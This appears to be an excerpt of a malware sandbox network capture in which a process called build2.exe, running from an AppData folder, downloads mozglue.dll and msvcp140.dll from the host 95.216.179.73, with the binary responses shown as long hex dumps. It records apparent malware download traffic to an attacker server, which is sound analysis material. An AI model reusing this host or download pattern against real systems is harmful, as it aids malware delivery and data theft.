2024-04-04 15:49:27 UTC	16384	IN	Data Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE\|l
2024-04-04 15:49:27 UTC	16384	IN	Data Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
2024-04-04 15:49:27 UTC	16384	IN	Data Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
2024-04-04 15:49:27 UTC	16384	IN	Data Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff Data Ascii: 0<48%8A)$(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.10	49780	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:29 UTC	220	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Cache-Control: no-cache
2024-04-04 15:49:30 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:29 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-94750" Accept-Ranges: bytes
2024-04-04 15:49:30 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-04-04 15:49:30 UTC	16384	IN	Data Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46 Data Ascii: A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPFLFPF
2024-04-04 15:49:30 UTC	16384	IN	Data Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1 Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
2024-04-04 15:49:30 UTC	16384	IN	Data Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}LQ
2024-04-04 15:49:30 UTC	16384	IN	Data Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07 Data Ascii: 1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
2024-04-04 15:49:30 UTC	16384	IN	Data Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
2024-04-04 15:49:30 UTC	16384	IN	Data Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4\|$
2024-04-04 15:49:30 UTC	16384	IN	Data Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$\|$K$S
2024-04-04 15:49:30 UTC	16384	IN	Data Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
2024-04-04 15:49:31 UTC	16384	IN	Data Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.10	49783	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:32 UTC	221	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Cache-Control: no-cache
2024-04-04 15:49:32 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:32 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-6dde8" Accept-Ranges: bytes
2024-04-04 15:49:32 UTC	16138	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-04-04 15:49:33 UTC	16384	IN	Data Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
2024-04-04 15:49:33 UTC	16384	IN	Data Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00 Data Ascii: {\|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
2024-04-04 15:49:33 UTC	16384	IN	Data Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1 Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]ED{I
2024-04-04 15:49:33 UTC	16384	IN	Data Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
2024-04-04 15:49:33 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8 Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
